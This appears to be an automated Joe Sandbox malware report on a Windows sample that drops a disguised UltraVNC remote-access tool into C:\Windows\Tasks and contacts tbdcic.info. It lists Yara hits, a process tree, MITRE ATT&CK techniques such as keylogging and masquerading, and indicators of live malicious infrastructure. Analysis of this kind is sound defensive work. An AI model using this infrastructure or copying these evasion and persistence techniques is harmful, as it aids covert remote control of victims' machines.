Source: Yara match | File source: 00000024.00000002.1778706674.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.1609590258.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1423232596.000000000257B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.3281159795.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000000.1523669185.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1422930123.0000000002923000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000000.1696757218.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000000.1776578444.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000000.1606181328.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: T8xrZb7nBL.exe PID: 7828, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: browser_sn.exe PID: 7844, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: browser_sn.exe PID: 6020, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: browser_sn.exe PID: 5252, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: browser_sn.exe PID: 6516, type: MEMORYSTR
Source: Yara match | File source: C:\Windows\Tasks\browser_sn.exe, type: DROPPED
Source: Yara match | File source: C:\Windows\Tasks\Xv6Ya.d8LhT, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT, type: DROPPED

                            Remote Access Functionality

Source: Yara match, File source: 34.0.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 23.0.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 27.2.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 36.0.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 34.2.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 27.0.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 23.2.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 36.2.browser_sn.exe.7ff6c2b80000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000024.00000002.1778706674.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 0000001B.00000002.1609590258.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.1423232596.000000000257B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 00000022.00000002.3281159795.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000000.1523669185.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.1422930123.0000000002923000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 00000022.00000000.1696757218.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 00000024.00000000.1776578444.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 0000001B.00000000.1606181328.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: T8xrZb7nBL.exe PID: 7828, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: browser_sn.exe PID: 7844, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: browser_sn.exe PID: 6020, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: browser_sn.exe PID: 5252, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: browser_sn.exe PID: 6516, type: MEMORYSTR
Source: Yara match, File source: C:\Windows\Tasks\browser_sn.exe, type: DROPPED
Source: Yara match, File source: C:\Windows\Tasks\Xv6Ya.d8LhT, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT, type: DROPPED
Source: browser_sn.exe, 00000017.00000002.1678945320.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: RFB 003.008
Source: browser_sn.exe, 00000022.00000002.3280567658.0000000002AEA000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: RFB 003.008
Source: browser_sn.exe, 00000022.00000003.2118995202.0000000002AEA000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: RFB 003.008
Source: browser_sn.exe, 00000022.00000003.1894011501.0000000002AEA000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: RFB 003.008
Source: browser_sn.exe, 00000022.00000003.2905085264.0000000002AEA000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: RFB 003.008
Source: browser_sn.exe, 00000022.00000003.2457395600.0000000002AEA000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: RFB 003.008
MITRE ATT&CK Matrix (one line per tactic column; the number in parentheses is the count the report shows beside a technique, techniques without a number carry no count in the report)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Valid Accounts (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Windows Management Instrumentation (1); Native API (2); Command and Scripting Interpreter (2); Scheduled Task/Job (1); Service Execution (1); Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: DLL Side-Loading (1); Valid Accounts (1); Windows Service (11); Scheduled Task/Job (1); Bootkit (1); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Valid Accounts (1); Access Token Manipulation (11); Windows Service (11); Process Injection (22); Scheduled Task/Job (1); Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Timestomp (1); DLL Side-Loading (1); Masquerading (231); Valid Accounts (1); Virtualization/Sandbox Evasion (1); Access Token Manipulation (11); Process Injection (22); Bootkit (1)
Credential Access: Input Capture (121); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (4); System Information Discovery (26); Security Software Discovery (31); Virtualization/Sandbox Evasion (1); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1); System Network Connections Discovery
Lateral Movement: Remote Desktop Protocol (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (1); Screen Capture (1); Input Capture (121); Clipboard Data (3); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (12); Remote Access Software (1); Non-Application Layer Protocol (1); Application Layer Protocol (2); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
Behavior Graph ID: 1579878
Sample: T8xrZb7nBL.exe
Start date: 23/12/2024
Architecture: WINDOWS
Score: 84

Sample-level DNS/IP: x1.i.lencr.org; tbdcic.info; bg.microsoft.map.fastly.net
Sample-level signatures: Icon mismatch, binary includes an icon from a different legit application in order to fool users; Yara detected UltraVNC Hacktool; AI detected suspicious sample; 3 other signatures

Process tree (graph node number in brackets; numbers in parentheses are the counts shown beside the process in the graph, see legend):
T8xrZb7nBL.exe [10] (9), started
    dropped: C:\Users\user\AppData\Local\...\Xv6Ya.d8LhT, PE32+; C:\Users\user\AppData\Local\...\uqVb3.kkb9h, PE32+
    signature: Contains functionality to register a low level keyboard hook
    cmd.exe [14] (3, 6), started
        dropped: C:\Windows\Tasks\conhost.exe, PE32+; C:\Windows\Tasks\browser_sn.exe, PE32+
        cmd.exe [23], started
            signature: Drops executables to the windows directory (C:\Windows) and starts them
            browser_sn.exe [39], started
                signature: Contains VNC / remote desktop functionality (version string found)
            timeout.exe [42], started
            taskkill.exe [44], started
            4 other processes [48]
        browser_sn.exe [26], started
            network: tbdcic.info 194.190.152.201, port 443, local ports 49723, 49724, RSHB-ASRU, Russian Federation
            signature: Contains VNC / remote desktop functionality (version string found)
        Acrobat.exe [29] (20, 61), started
            AcroCEF.exe [46] (108), started
                AcroCEF.exe [50], started
        12 other processes [37]
    cmd.exe [17] (7), started
        dropped: C:\Windows\Tasks\Xv6Ya.d8LhT, PE32+; C:\Windows\Tasks\uqVb3.kkb9h, PE32+
        conhost.exe [31], started
    cmd.exe [19] (2), started
        conhost.exe [33], started
    cmd.exe [21] (2), started
        conhost.exe [35], started



Antivirus detection (sample)
Source | Detection | Scanner | Label | Link
T8xrZb7nBL.exe | 3% | ReversingLabs | |

Antivirus detection (dropped files)
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9h | 0% | ReversingLabs | |
C:\Windows\Tasks\Xv6Ya.d8LhT | 0% | ReversingLabs | |
C:\Windows\Tasks\browser_sn.exe | 0% | ReversingLabs | |
C:\Windows\Tasks\conhost.exe | 0% | ReversingLabs | |
C:\Windows\Tasks\uqVb3.kkb9h | 0% | ReversingLabs | |
                            No Antivirus matches
                            No Antivirus matches
                            No Antivirus matches
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
tbdcic.info | 194.190.152.201 | true | false | | high
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
x1.i.lencr.org | unknown | unknown | false | | high
URLs
Name | Source | Malicious | Antivirus Detection | Reputation

http://www.uvnc.com
Source: T8xrZb7nBL.exe, 00000000.00000003.1423232596.000000000257B000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002923000.00000004.00000020.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000000.1523669185.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609590258.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3281159795.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778706674.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr
Malicious: false | Antivirus Detection: | Reputation: high

http://x1.i.lencr.org/
Source: 2D85F72862B55C4EADD9E66E06947F3D0.14.dr
Malicious: false | Antivirus Detection: | Reputation: high

http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr
Malicious: false | Antivirus Detection: | Reputation: high

http://www.uvnc.comopenhttp://forum.uvnc.comnet
Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr
Malicious: false | Antivirus Detection: | Reputation: unknown

http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: T8xrZb7nBL.exe, 00000000.00000003.1423232596.0000000002589000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002931000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr
Malicious: false | Antivirus Detection: | Reputation: high

http://java.sun.com/products/plugin/index.html#download
Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr
Malicious: false | Antivirus Detection: | Reputation: high

http://forum.uvnc.com
Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr
Malicious: false | Antivirus Detection: | Reputation: unknown

http://ocsp.thawte.com0
Source: T8xrZb7nBL.exe, 00000000.00000003.1423232596.0000000002589000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002931000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr
Malicious: false | Antivirus Detection: | Reputation: high
IPs
IP | Domain | Country | ASN | ASN Name | Malicious
194.190.152.201 | tbdcic.info | Russian Federation | 41615 | RSHB-ASRU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579878
Start date and time: 2024-12-23 13:37:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 42
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: T8xrZb7nBL.exe (renamed because the original name is a hash value)
Original Sample Name: d9c7850bde98f2a2cb586b482efd8ff0b6c959ce71f9db699a7b457d5daf5f9e.exe
Detection: MAL
Classification: mal84.troj.spyw.evad.winEXE@69/63@3/1
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 172.64.41.3, 162.159.61.3, 23.218.208.137, 23.195.39.65, 199.232.210.172, 184.30.20.134, 2.19.198.27, 23.32.239.56, 2.16.168.102, 2.16.168.117, 23.218.208.109, 3.233.129.217, 4.245.163.56
• Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, e4578.dscg.akamaiedge.net, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e4578.dscb.akamaiedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: T8xrZb7nBL.exe
                                                  No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
194.190.152.201 | mSRW5AfJpC.exe | Get hash | malicious | UltraVNC | Browse |
194.190.152.201 | 7q551ugrWe.exe | Get hash | malicious | UltraVNC | Browse |
194.190.152.201 | Olz7TmvkEW.exe | Get hash | malicious | UltraVNC | Browse |
194.190.152.201 | mSRW5AfJpC.exe | Get hash | malicious | UltraVNC | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
bg.microsoft.map.fastly.net | mSRW5AfJpC.exe | Get hash | malicious | UltraVNC | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | q8b3OisMC4.dll | Get hash | malicious | Unknown | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | 7q551ugrWe.exe | Get hash | malicious | UltraVNC | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | Olz7TmvkEW.exe | Get hash | malicious | UltraVNC | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | mSRW5AfJpC.exe | Get hash | malicious | UltraVNC | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | eszstwQPwq.ps1 | Get hash | malicious | LockBit ransomware, Metasploit | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | 0vM02qWRT9.ps1 | Get hash | malicious | LockBit ransomware, Metasploit | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | #U5b89#U88c5#U52a9#U624b_2.0.8.exe | Get hash | malicious | Unknown | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | fiFdIrd.txt.js | Get hash | malicious | Unknown | Browse | 199.232.210.172
tbdcic.info | mSRW5AfJpC.exe | Get hash | malicious | UltraVNC | Browse | 194.190.152.201
tbdcic.info | 7q551ugrWe.exe | Get hash | malicious | UltraVNC | Browse | 194.190.152.201
tbdcic.info | Olz7TmvkEW.exe | Get hash | malicious | UltraVNC | Browse | 194.190.152.201
tbdcic.info | mSRW5AfJpC.exe | Get hash | malicious | UltraVNC | Browse | 194.190.152.201
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
RSHB-ASRU | mSRW5AfJpC.exe | Get hash | malicious | UltraVNC | Browse | 194.190.152.201
RSHB-ASRU | 7q551ugrWe.exe | Get hash | malicious | UltraVNC | Browse | 194.190.152.201
RSHB-ASRU | Olz7TmvkEW.exe | Get hash | malicious | UltraVNC | Browse | 194.190.152.201
RSHB-ASRU | mSRW5AfJpC.exe | Get hash | malicious | UltraVNC | Browse | 194.190.152.201
RSHB-ASRU | Scan_Zakaz_1416-02-24_13-02-2024.jpg.lnk | Get hash | malicious | Reverse SSH | Browse | 194.190.152.129
RSHB-ASRU | Scan_Zayavlenie_1416-02-24_13-02-2024.jpg.lnk | Get hash | malicious | Reverse SSH | Browse | 194.190.152.129
RSHB-ASRU | document.jpg.lnk | Get hash | malicious | Reverse SSH | Browse | 194.190.152.129
RSHB-ASRU | tiago.exe | Get hash | malicious | Reverse SSH | Browse | 194.190.152.129
RSHB-ASRU | 0EZ9Ho3Ruc.exe | Get hash | malicious | RedLine | Browse | 194.190.152.148
                                                          No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT | mSRW5AfJpC.exe | Get hash | malicious | UltraVNC | Browse |
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT | 7q551ugrWe.exe | Get hash | malicious | UltraVNC | Browse |
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT | Olz7TmvkEW.exe | Get hash | malicious | UltraVNC | Browse |
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT | mSRW5AfJpC.exe | Get hash | malicious | UltraVNC | Browse |
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9h | mSRW5AfJpC.exe | Get hash | malicious | UltraVNC | Browse |
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9h | 7q551ugrWe.exe | Get hash | malicious | UltraVNC | Browse |
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9h | Olz7TmvkEW.exe | Get hash | malicious | UltraVNC | Browse |
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9h | mSRW5AfJpC.exe | Get hash | malicious | UltraVNC | Browse |
